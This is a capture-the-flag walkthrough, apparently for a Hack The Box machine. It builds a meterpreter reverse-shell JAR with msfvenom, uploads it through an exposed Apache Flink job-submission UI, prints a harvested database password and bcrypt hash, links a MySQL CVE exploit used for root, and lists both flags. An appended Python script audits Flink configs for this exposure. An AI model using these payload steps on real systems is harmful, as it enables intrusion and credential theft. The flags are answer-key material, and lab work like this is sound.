# level

Nmap scan this fucker - Apache Flink is running, wtf is that.

https://www.programmersought.com/article/61642345758/

Looks like we can upload some Java. Make a meterpreter:

```
msfvenom --platform java -f jar -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -o payload.jar
```

Upload it to the job manager, make sure you have a handler running:

http://10.129.172.102:8081/#/submit

Boom, shell as www-data. Flag is in /home/albert/user.txt

Readable: /var/www/albert, /etc/bash.rc

Hash from MySQL Users table:

```
$2y$10$zPLflFwQsMM6AMn44oQyl.uJgZhcAQcA5I6X/Cj9mKse1OBPu9aZy
```

Type is bcrypt (3200 hashcat) :(

linpeas.sh finds some interesting passwords:

```
/var/www/html/.env:DB_CONNECTION=mysql
/var/www/html/.env:DB_DATABASE=hcms
/var/www/html/.env:DB_HOST=127.0.0.1
/var/www/html/.env:DB_USERNAME=hcms
```

```
cat /var/www/html/.env
DB_HOST=127.0.0.1
DB_CONNECTION=mysql
DB_USERNAME=hcms
DB_PASSWORD=N>2sM4^R_j>g)cfe
DB_DATABASE=hcms
HCMS_ADMIN_PREFIX=admin
```

port 3306 mysql is configured to listen on, but it's not actually

Use the following CVE to build a meterpreter and have mysqld run that, which will drop you into a root shell. Flag for user is in /home/albert/user.txt and root flag is /root/root.txt

https://github.com/Al1ex/CVE-2021-27928/tree/bb49c01063eee7ee276d4113af703b24ff650617

user: HTB{0utd4t3d_cms_1s_n0_g00d}

root: HTB{br0k3n_st0r4g3}
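
The foothold above came from a Flink web UI on port 8081 that accepted an uploaded JAR. As an added example (not part of the original notes and not Flink project code), this Python check audits a `flink-conf.yaml` for that exposure; the sample configs are constructed, and the finding names and the rule that an unset `rest.bind-address` is reported are assumptions of this example.

```python
import ipaddress

# Constructed sample configs in Flink's flat "key: value" format (not from the target host).
EXPOSED_CONF = """\
# constructed example
jobmanager.rpc.address: localhost
rest.port: 8081
rest.bind-address: 0.0.0.0
"""
HARDENED_CONF = """\
rest.port: 8081
rest.bind-address: 127.0.0.1
web.submit.enable: false   # no JAR upload from the web UI
"""

def parse_flink_conf(text):
    """Parse flat 'key: value' lines, ignoring blanks and # comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split(" #", 1)[0].strip()
        if not line or line.startswith("#") or ":" not in line:
            continue
        key, value = line.split(":", 1)
        conf[key.strip()] = value.strip()
    return conf

def is_loopback(addr):
    if addr.lower() == "localhost":
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # other hostname: treated as reachable, review by hand

def audit(text):
    """Return hypothetical finding labels for the job-submission exposure."""
    conf = parse_flink_conf(text)
    findings = []
    port = conf.get("rest.port", "8081")  # Flink's default REST/web port
    # web.submit.enable defaults to true: the web UI accepts JAR uploads.
    if conf.get("web.submit.enable", "true").lower() != "false":
        findings.append("web-submit-enabled")
    bind = conf.get("rest.bind-address")
    if bind is None:
        findings.append("rest-bind-unset")  # assumption: report for manual review
    elif not is_loopback(bind):
        findings.append(f"rest-reachable:{bind}:{port}")
    return findings

if __name__ == "__main__":
    for name, text in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "no findings")
```

`web.submit.enable` only guards the upload feature in the UI; a session cluster still accepts jobs over REST, so keeping the REST port off untrusted networks is the control that matters.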